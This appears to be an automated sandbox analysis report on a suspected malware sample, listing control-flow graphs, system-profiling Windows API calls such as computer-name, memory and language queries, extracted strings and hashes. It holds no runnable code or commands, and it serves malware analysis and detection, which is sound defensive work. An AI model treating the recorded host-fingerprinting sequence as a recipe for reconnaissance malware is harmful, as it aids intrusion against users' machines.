                          control_flow_graph 281 4086b0-4086c1 call 43e570 284 408915-408917 ExitProcess 281->284 285 4086c7-4086ce call 437e80 281->285 288 408910 call 43ee90 285->288 289 4086d4-4086f8 GetCurrentProcessId GetCurrentThreadId 285->289 288->284 291 4086fa-4086fc 289->291 292 4086fe-4087bf SHGetSpecialFolderPathW GetForegroundWindow 289->292 291->292 293 4087f0-4087f9 292->293 294 4087c1-4087ee 292->294 295 408800-408830 293->295 294->293 295->295 296 408832-40885f call 43d400 295->296 299 408860-40889b 296->299 300 4088d4-4088f2 call 409b10 299->300 301 40889d-4088d2 299->301 304 4088f4 call 40ca30 300->304 305 4088fe-408905 300->305 301->299 309 4088f9 call 40b650 304->309 305->288 307 408907-40890d call 407f30 305->307 307->288 309->305
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 004086D4
                          • GetCurrentThreadId.KERNEL32 ref: 004086DE
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087A2
                          • GetForegroundWindow.USER32 ref: 004087B7
                          • ExitProcess.KERNEL32 ref: 00408917
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                          • String ID: &:
                          • API String ID: 4063528623-1752886865
                          • Opcode ID: 169a32c55f6ff262bbd8d02f98e5ec62c91dc29f1bde65e51cef4688554a26c2
                          • Instruction ID: 036560ca4111f5e7ecce0a739366ca84d161b23d80b076a90d52c525e0c1b424
                          • Opcode Fuzzy Hash: 169a32c55f6ff262bbd8d02f98e5ec62c91dc29f1bde65e51cef4688554a26c2
                          • Instruction Fuzzy Hash: 235176B3F103140BC7186E799D52356B6C79BC5314F1F853EA882EB3E6ED7988028699
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: *7))$\}A
                          • API String ID: 0-1570683552
                          • Opcode ID: e9e37dad1544a76698409319f21d22744e5846338d98e5c544e44a7936268ca1
                          • Instruction ID: 2c7540a860bd979036ba93ec2d6abef0451b0b41cda9469a079dd693cc802df7
                          • Opcode Fuzzy Hash: e9e37dad1544a76698409319f21d22744e5846338d98e5c544e44a7936268ca1
                          • Instruction Fuzzy Hash: 056231B45047018FD724CF28D881667B7B2FF46314F198A2ED49A8B792E738F892CB55

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 515 427a00-427a21 516 427a30-427a52 515->516 516->516 517 427a54-427a61 516->517 518 427a63-427a6f 517->518 519 427aa4-427ac4 517->519 521 427a70-427a77 518->521 520 427ad0-427b4b 519->520 520->520 522 427b4d-427b57 520->522 523 427a80-427a87 521->523 524 427a79-427a7c 521->524 525 427c8f-427c98 522->525 526 427b5d-427b7f call 43d400 522->526 523->519 528 427a89-427a9c call 43ef30 523->528 524->521 527 427a7e 524->527 533 427b80-427bad 526->533 527->519 532 427aa1 528->532 532->519 533->533 534 427baf-427bb7 533->534 535 427c84 534->535 536 427bbd-427bc9 534->536 538 427c86-427c8c call 43d420 535->538 537 427bd0-427bd7 536->537 539 427be3-427bea 537->539 540 427bd9-427bdc 537->540 538->525 539->535 543 427bf0-427bfe call 43ef30 539->543 540->537 542 427bde 540->542 542->535 546 427c03-427c0a 543->546 546->538 547 427c0c-427c14 546->547 548 427c20-427c35 547->548 548->548 549 427c37-427c39 548->549 550 427c40-427c4d call 407f20 549->550 551 427c3b 549->551 554 427c61-427c6b 550->554 551->550 555 427c50-427c5f 554->555 556 427c6d 554->556 555->554 557 427c99-427c9d 555->557 558 427c70-427c80 556->558 559 427ca3-427caf 557->559 560 427d76-427d7f call 407f30 557->560 558->558 561 427c82 558->561 562 427cb1-427cb8 559->562 563 427ced-427d2b call 407f20 call 408d80 559->563 560->538 561->555 565 427ccc-427cd0 562->565 577 427d30-427d55 563->577 568 427cd2-427cdb 565->568 569 427cc0 565->569 572 427ce2-427ce6 568->572 573 427cdd-427ce0 568->573 571 427cc1-427cca 569->571 571->563 571->565 572->571 575 427ce8-427ceb 572->575 573->571 575->571 577->577 578 427d57-427d72 call 408ef0 call 407f30 577->578 578->560
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: f4kl$i$pedu$(
                          • API String ID: 2994545307-2864204077
                          • Opcode ID: 8027afebd5cc4665657b3f038854df0e719cbaae28e550e07bcd45e617562cb5
                          • Instruction ID: e0aedbb0e4675fbf1985af87ecba576ed208629cc0295d4850e1693e8caaea87
                          • Opcode Fuzzy Hash: 8027afebd5cc4665657b3f038854df0e719cbaae28e550e07bcd45e617562cb5
                          • Instruction Fuzzy Hash: B2917CB2F083205BD3109E76EC8262BB7D1DFC5324F59863EE89597381E63D9D05838A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 583 42e2ac-42e2c5 584 42e2d0-42e2e2 583->584 584->584 585 42e2e4-42e2ec 584->585 586 42e2f2-42e2f6 585->586 587 42e6a6 585->587 588 42e300-42e309 586->588 589 42e6a9-42e6c4 587->589 588->588 591 42e30b 588->591 592 42e6d0-42e6ee 589->592 591->589 592->592 593 42e6f0-42e6f5 592->593 594 42e6f7-42e6fb 593->594 595 42e70d 593->595 596 42e700-42e709 594->596 597 42e710-42e71c 595->597 596->596 598 42e70b 596->598 599 42e731-42e755 call 4406d0 597->599 600 42e71e 597->600 598->597 604 42e75a-42e777 GetPhysicallyInstalledSystemMemory 599->604 601 42e720-42e72d 600->601 601->601 603 42e72f 601->603 603->599 605 42e780-42e7a6 604->605 605->605 606 42e7a8-42e7b4 605->606 607 42e7ba-42e7bf 606->607 608 42e84f-42e858 606->608 609 42e7c0-42e7cf 607->609 610 42e884-42e8a3 608->610 611 42e7d0-42e7f3 609->611 612 42e8b0-42e8cb 610->612 611->611 613 42e7f5-42e7fb 611->613 612->612 614 42e8cd-42e8d2 612->614 615 42e83d-42e840 613->615 616 42e7fd-42e83b 613->616 617 42e8d4-42e8d8 614->617 618 42e8ed 614->618 620 42e842-42e84d 615->620 621 42e85a-42e87c 615->621 616->609 622 42e8e0-42e8e9 617->622 619 42e8f0-42e8f8 618->619 623 42e8fa-42e8fb 619->623 624 42e90b-42e913 619->624 625 42e87f-42e881 620->625 621->625 622->622 626 42e8eb 622->626 627 42e900-42e909 623->627 628 42e915-42e916 624->628 629 42e92b-42e972 624->629 625->610 626->619 627->624 627->627 630 42e920-42e929 628->630 631 42e980-42e992 629->631 630->629 630->630 631->631 632 42e994-42e999 631->632 633 42e9ab-42e9b3 632->633 634 42e99b-42e99f 632->634 636 42e9b5-42e9b6 633->636 637 42e9cb-42ea49 633->637 635 42e9a0-42e9a9 634->635 635->633 635->635 638 42e9c0-42e9c9 636->638 638->637 638->638
                          APIs
                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042E75E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InstalledMemoryPhysicallySystem
                          • String ID: wbPb
                          • API String ID: 3960555810-2247624023
                          • Opcode ID: c53d22b7eeba8885e02db97d7904cda18866f2e59bb46a9f874bb5f0e6408eb9
                          • Instruction ID: d9ca414ca8b870e01a5246aeb0419e6747ea64e100486a52127a8d92b944c332
                          • Opcode Fuzzy Hash: c53d22b7eeba8885e02db97d7904cda18866f2e59bb46a9f874bb5f0e6408eb9
                          • Instruction Fuzzy Hash: 92C1D5706056928BDB19CF3A9450323FBE2AFA7300F28D59ED4D68B786D3399842CB55
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ce655208a9e39821545b6890dd47f5cf7e4c9e1a2635a24d580d70fa6e9cd2c
                          • Instruction ID: 95bba1d8f348dfd926d8cf433ff28fa22eb7d3d8fbdb803361d40147ce9e3657
                          • Opcode Fuzzy Hash: 9ce655208a9e39821545b6890dd47f5cf7e4c9e1a2635a24d580d70fa6e9cd2c
                          • Instruction Fuzzy Hash: FE72FA76604B408FD714DF38C9853A6BBE2AB85314F198A3ED4EBC77D1E638A545CB02
                          APIs
                          • LdrInitializeThunk.NTDLL(00441CF0,?,00000018,?,?,00000018,?,?,?), ref: 0043EF5E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: @
                          • API String ID: 2994545307-2766056989
                          • Opcode ID: d2bd5b72376283c24bb44b7a37b974a3844707c119ca00f1f517c905320bbbf4
                          • Instruction ID: 7c6e8be97ec7731e9ad9a50c4879d693c651ee70ecd62fe68275c38026178db7
                          • Opcode Fuzzy Hash: d2bd5b72376283c24bb44b7a37b974a3844707c119ca00f1f517c905320bbbf4
                          • Instruction Fuzzy Hash: 01315571A443009BE714CF54CC95A2BB7F1EF85318F05852EE9998B3E0E739A949C786
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: E?sB
                          • API String ID: 2994545307-1048174391
                          • Opcode ID: 770186e44843b778794a8fae440417d11ff113e4907133ed2eadd8498f5432eb
                          • Instruction ID: 286096024ede14c21f1e5b8dc750017c638cd025a402e33ab74259a3e3e4e948
                          • Opcode Fuzzy Hash: 770186e44843b778794a8fae440417d11ff113e4907133ed2eadd8498f5432eb
                          • Instruction Fuzzy Hash: C9214730615A508AEB198F3AD820736BB92AF47304F58835ED0D7977D6CB2DB812C758
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: @
                          • API String ID: 2994545307-2766056989
                          • Opcode ID: a6bdbf5aa3b788deab623bbdccb104fd145a9441af9656b6a93166c977c4f2a9
                          • Instruction ID: c7e170592f7b740470b14c6fe7e1a6e5e5ad0f8f221948f4ef1b2be7170c20e4
                          • Opcode Fuzzy Hash: a6bdbf5aa3b788deab623bbdccb104fd145a9441af9656b6a93166c977c4f2a9
                          • Instruction Fuzzy Hash: 102149714093049FD3148F18D8C162BF7B5EFC6324F259A2DEAA8073D0D37698288B9A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 5a4889a86262d2699285de0f9539d4cedd412aaa4aa7de9bf9f896a6bdfbb2db
                          • Instruction ID: 3456d00c2b49cd3bf234c0514189fd438fcf6f65ee1b437ae50faf38d3aa8765
                          • Opcode Fuzzy Hash: 5a4889a86262d2699285de0f9539d4cedd412aaa4aa7de9bf9f896a6bdfbb2db
                          • Instruction Fuzzy Hash: 31918A72A097104BE718DE28DC8062FB793BFD8320F19C63DE9D58B3A5EA749C458745
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2bbff2dae2bbe3c6816aba2c5524b90667d968de1dd5dfa4b8fd30fa38b6695d
                          • Instruction ID: 921a3f47200d8e694167fff3dde371beddebeeb7d78b9489eb8b8169be34c6cf
                          • Opcode Fuzzy Hash: 2bbff2dae2bbe3c6816aba2c5524b90667d968de1dd5dfa4b8fd30fa38b6695d
                          • Instruction Fuzzy Hash: 517147757183004BE318DE25D88067BB7A3EBC5364F1DC63EE4A98B3A1D7399C46874A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e2d5b5d881e10d8a53f9304ca197d662aabc7833ae0c4cf5f46f613eb0904468
                          • Instruction ID: c3b623652d36f59f6ecc49c65232d072acfa03e6ccd09f2bd701e8607b6eeef5
                          • Opcode Fuzzy Hash: e2d5b5d881e10d8a53f9304ca197d662aabc7833ae0c4cf5f46f613eb0904468
                          • Instruction Fuzzy Hash: 44517E36E043005BD7108F24EC8276BB7D2EBD9324F1A962DD4D957391D235AC068B99
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4d602a30d7ce30917ac3b010c22e0804f40f31b319eb4d3f8b06b4e3cfbd8b08
                          • Instruction ID: 5ca4fb3a12703c5312f55497a9e9fe36ecf749290688e618fcccdd9dd4b6eebe
                          • Opcode Fuzzy Hash: 4d602a30d7ce30917ac3b010c22e0804f40f31b319eb4d3f8b06b4e3cfbd8b08
                          • Instruction Fuzzy Hash: 48813C31108BC28ED325CB3C8849B46BFD26B96224F19C7ACD0F94B3E2C7789506CB56
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 1afcb714a6743234a3e666a7f0991ba5e13aa50c1bc12502d5c68f21b313f8ec
                          • Instruction ID: 22e42b1c34829c1bca3d66fdee3d8cf3cdc863a6d00b3efea563a93e6afef01c
                          • Opcode Fuzzy Hash: 1afcb714a6743234a3e666a7f0991ba5e13aa50c1bc12502d5c68f21b313f8ec
                          • Instruction Fuzzy Hash: 5E314F746812006BE7189B299C90A3B73A6EB8D315F19663DE1D7432E0E3346C319A0B
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0214fc76d68e595672e3475fe98d694cead03254d0a4adc6fc1a4f20e720711c
                          • Instruction ID: 5c57006ad8233bfc5ebcdb89710419ebefc60bc829d54376d73d5dc59cb80d42
                          • Opcode Fuzzy Hash: 0214fc76d68e595672e3475fe98d694cead03254d0a4adc6fc1a4f20e720711c
                          • Instruction Fuzzy Hash: AD31B4B5F015209BEA15B762AC12B6F32129F8171CF48413EE446236D3DB3C6A16859F
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b66bb7412e6704fea7051bc5500c38b76fa1314ff79336cf7b0226ef7180925
                          • Instruction ID: 6f8ed506f1e3fd54ca54cd21f862a48454b1ed58ec89c7fb076af2327c38274b
                          • Opcode Fuzzy Hash: 8b66bb7412e6704fea7051bc5500c38b76fa1314ff79336cf7b0226ef7180925
                          • Instruction Fuzzy Hash: 64113B316193404FD718CF24A9445AB7BA1EFC3318F59463CE4D16B283C231D90ACB9B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 643 42dacf-42f2c8 FreeLibrary call 4406d0 647 42f2d0-42f2e2 643->647 647->647 648 42f2e4-42f2e9 647->648 649 42f3a3 648->649 650 42f2ef-42f2f6 648->650 652 42f3a9-42f3dc GetComputerNameExA 649->652 651 42f300-42f309 650->651 651->651 653 42f30b 651->653 653->652
                          APIs
                          • FreeLibrary.KERNEL32(?), ref: 0042DAD7
                          • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F3BE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: ComputerFreeLibraryName
                          • String ID:
                          • API String ID: 2904949787-0
                          • Opcode ID: 66e1106ca01b51e53e66c49623e9b491e1b8f5bae10938b4e3a39274d3b1fe74
                          • Instruction ID: cfdc5763d46ce157d9a16029533cd606a6a9da3d89bad261fd0ce4e59aa67e05
                          • Opcode Fuzzy Hash: 66e1106ca01b51e53e66c49623e9b491e1b8f5bae10938b4e3a39274d3b1fe74
                          • Instruction Fuzzy Hash: 7A11C4742002428FD7218F35E850666BBE1EF47300F5845ADD4D7CB391D635A855CB15

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 654 40ca9e-40caeb CoInitializeSecurity * 2
                          APIs
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAB0
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAD2
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeSecurity
                          • String ID:
                          • API String ID: 640775948-0
                          • Opcode ID: 0de48d065ac94c9144e44826edcbf70e60926b4b80bb791f05d4b16727094894
                          • Instruction ID: 5dea0050c3e7561093ab298b4a75391d741ec40992f344bafc613f4a58a2b7e4
                          • Opcode Fuzzy Hash: 0de48d065ac94c9144e44826edcbf70e60926b4b80bb791f05d4b16727094894
                          • Instruction Fuzzy Hash: C4E0E2383C87007BF6784780AC97F003221A782F22F340324F3253E2E58AE03100450C

                          Control-flow Graph

                          APIs
                          • GetForegroundWindow.USER32 ref: 0043F8DD
                          • GetForegroundWindow.USER32 ref: 0043F8F0
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: ForegroundWindow
                          • String ID:
                          • API String ID: 2020703349-0
                          • Opcode ID: adbbd47b7e4fe6a40311d875cff0937dece61f8ad492c2988eaad5924af29625
                          • Instruction ID: 707f734249836f37f6ac807264d3ad97774c7dc290fc6eb88822435ce75e38e2
                          • Opcode Fuzzy Hash: adbbd47b7e4fe6a40311d875cff0937dece61f8ad492c2988eaad5924af29625
                          • Instruction Fuzzy Hash: D7F0A0B77521018B9B0C9BB6EC9B1AE3697A6C521C72E423ED10A83246DE38A9054705
                          APIs
                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042E75E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InstalledMemoryPhysicallySystem
                          • String ID:
                          • API String ID: 3960555810-0
                          • Opcode ID: 9b5f794ddeb33f935bd8455202c8f82bec13507c2732ac4272d80e20ca8aedec
                          • Instruction ID: c1b8f78226f988709d3d6649d82e729c8e11c3646cdf97e6c9d3b7281c0e0cd9
                          • Opcode Fuzzy Hash: 9b5f794ddeb33f935bd8455202c8f82bec13507c2732ac4272d80e20ca8aedec
                          • Instruction Fuzzy Hash: 4A4128617046504BDB298B3AE851337FBD39FEA300F1CC46ED496CB38AD6789402C719
                          APIs
                          • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F4BC
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: ComputerName
                          • String ID:
                          • API String ID: 3545744682-0
                          • Opcode ID: 9aa72d66e942acee1bbbc09795cd044986575211dc3d4f8bcd9ec92cffa60820
                          • Instruction ID: 0a2603f67324ae797109b40a484b9141895fd856f29b2b65fb15cdbd8d95a961
                          • Opcode Fuzzy Hash: 9aa72d66e942acee1bbbc09795cd044986575211dc3d4f8bcd9ec92cffa60820
                          • Instruction Fuzzy Hash: 6E21DB746447428BD715CF29C450373BBE2FFD2311F5881AED4D68B786CA78A84ACB54
                          APIs
                          • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F4BC
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: ComputerName
                          • String ID:
                          • API String ID: 3545744682-0
                          • Opcode ID: 1a66000775fda9d60318c17d332c6f170cc897aaced4c2e8835181987e01a070
                          • Instruction ID: 4f16bf98e14b280e5630b6f83d12179a784a689606e3ed24519d17253af40dbe
                          • Opcode Fuzzy Hash: 1a66000775fda9d60318c17d332c6f170cc897aaced4c2e8835181987e01a070
                          • Instruction Fuzzy Hash: 0721D774640B428BD315CF29C450773B7A2FFC6321F588569D4D687785CA38B846CB54
                          APIs
                          • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F3BE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: ComputerName
                          • String ID:
                          • API String ID: 3545744682-0
                          • Opcode ID: d0749cdc5df812cb6ac7c8d757f54b4bf86516530be8d0671feb7a3c957f9d73
                          • Instruction ID: 6baabc2f400d74bc3cc3e52e4864705022086fc3a6dac1c42d8c82fd81c1826e
                          • Opcode Fuzzy Hash: d0749cdc5df812cb6ac7c8d757f54b4bf86516530be8d0671feb7a3c957f9d73
                          • Instruction Fuzzy Hash: AC11C4B42002428FE7218F39E860766BBE1EF5B310F5885AED4D6CB392D6359855CB54
                          APIs
                          • GetUserDefaultUILanguage.KERNELBASE ref: 0043849D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: DefaultLanguageUser
                          • String ID:
                          • API String ID: 95929093-0
                          • Opcode ID: 8e4b8c7decdfa350a8bc859784f24849c84484a77cca8042150f9ef646be80da
                          • Instruction ID: e4a2fe5edf5eaf821eb43d3253ba587dcf30a68b9fae9967b9745e6c75c08cbc
                          • Opcode Fuzzy Hash: 8e4b8c7decdfa350a8bc859784f24849c84484a77cca8042150f9ef646be80da
                          • Instruction Fuzzy Hash: 0111D330A042998FEB55CF38C9943EE7BB19F5A304F1441ADD98997381DA354A45DB41
                          APIs
                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B5E1,00000000,00000001), ref: 0043EEE2
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: c1cfb25f9ca5057cbbecb85cc201234f314c3f5d7be1ff921169e6ec6f554acf
                          • Instruction ID: ba33a129d28c7172b56fe05f0f90b6f119921568aecab9275dd0d0c39a0e8d50
                          • Opcode Fuzzy Hash: c1cfb25f9ca5057cbbecb85cc201234f314c3f5d7be1ff921169e6ec6f554acf
                          • Instruction Fuzzy Hash: 70F0E27A809150FBC7102F25BC02A2B36A8EF9F319F06043AF40156252E739E812969F
                          APIs
                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA43
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: Initialize
                          • String ID:
                          • API String ID: 2538663250-0
                          • Opcode ID: 642477734c0a30261e0d3fef009ee2af9e9027b6d50c1c3110e2fccbcf79d17d
                          • Instruction ID: ffb6ed576fe853ee5a21e9a51bde7b0bbbbce661129cace3c9cde7aa92b908c6
                          • Opcode Fuzzy Hash: 642477734c0a30261e0d3fef009ee2af9e9027b6d50c1c3110e2fccbcf79d17d
                          • Instruction Fuzzy Hash: 9CE0F13772140007E70C5B68EC2BB543217C7C2304F0CD23C81664B5C9CD383808C2C5
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: BlanketProxy
                          • String ID:
                          • API String ID: 3890896728-0
                          • Opcode ID: 68a86c12092803995df73badf31053cff6c51b40ce8c9bf961eec9eb0bd2ed80
                          • Instruction ID: 761de1e76abfc9ea90946d1ed4181edd1fa90c59b6ac2b60fe9c48daef89d1e7
                          • Opcode Fuzzy Hash: 68a86c12092803995df73badf31053cff6c51b40ce8c9bf961eec9eb0bd2ed80
                          • Instruction Fuzzy Hash: 86F0F8B4609302CFD304DF68D4A871BBBE0EF85308F11891CE4A98B390CBB59548CF86
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: BlanketProxy
                          • String ID:
                          • API String ID: 3890896728-0
                          • Opcode ID: 1f11d6b5724a2fcd60a3fb59276043c54f0088b610810748f5cd56331374f6ec
                          • Instruction ID: a7951836f69d18ea9e2f5a6f4f7ac9b492bcf35ef2dd77ae782caa37a78da9e9
                          • Opcode Fuzzy Hash: 1f11d6b5724a2fcd60a3fb59276043c54f0088b610810748f5cd56331374f6ec
                          • Instruction Fuzzy Hash: DBF0D4B41087028FE310CF25C09934BBBE1AB81308F15891CE4A54B390D7BAE989CFC6
                          APIs
